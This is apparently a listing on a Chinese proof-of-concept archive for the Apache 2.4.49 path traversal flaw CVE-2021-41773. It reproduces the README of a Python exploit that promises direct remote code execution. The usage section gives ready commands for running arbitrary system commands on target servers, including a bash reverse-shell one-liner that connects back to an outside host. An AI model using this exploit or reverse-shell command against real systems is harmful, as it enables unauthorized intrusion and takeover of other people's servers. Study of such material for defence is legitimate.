支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:640

64.0%

POC详情: d477d87382a493aa14723e0b27b4680cf9b9ba42

来源
关联漏洞
标题:Apache HTTP Server 路径遍历漏洞 (CVE-2021-41773)
描述:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 2.4.49版本存在路径遍历漏洞,攻击者可利用该漏洞使用路径遍历攻击将URL映射到预期文档根以外的文件。
描述
Remote Code Execution PoC for Apache 2.4.49
介绍
# CVE-2021-41773 - Remote Code Execution in Apache 2.4.49

PoC for [CVE-2021-41773](https://nvd.nist.gov/vuln/detail/cve-2021-41773) as I just found over-complicated exploits and this one goes straight to the Remote Code Execution.

---

## Usage

Just specify the IP address running the vulnerable `Apache 2.4.49` server with `-i` and the desired system command with `-c`. If the web server is not running on port `80` we can specify it with `-p` and if the web server is using HTTPs you need to use `--use-https` flag.
```shell-session
$ python3 CVE-2021-41773.py -i 10.10.10.10 -c 'id'

$ python3 CVE-2021-41773.py -i example.com -p 8080 -c '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'

$ python3 CVE-2021-41773.py -i 20.20.20.20 -p 443 --use-https -c 'whoami'
```

Use it under your own responsability (:

Be ethical.
文件快照

[4.0K] /data/pocs/d477d87382a493aa14723e0b27b4680cf9b9ba42 ├── [5.8K] CVE-2021-41773.py └── [ 841] README.md 1 directory, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。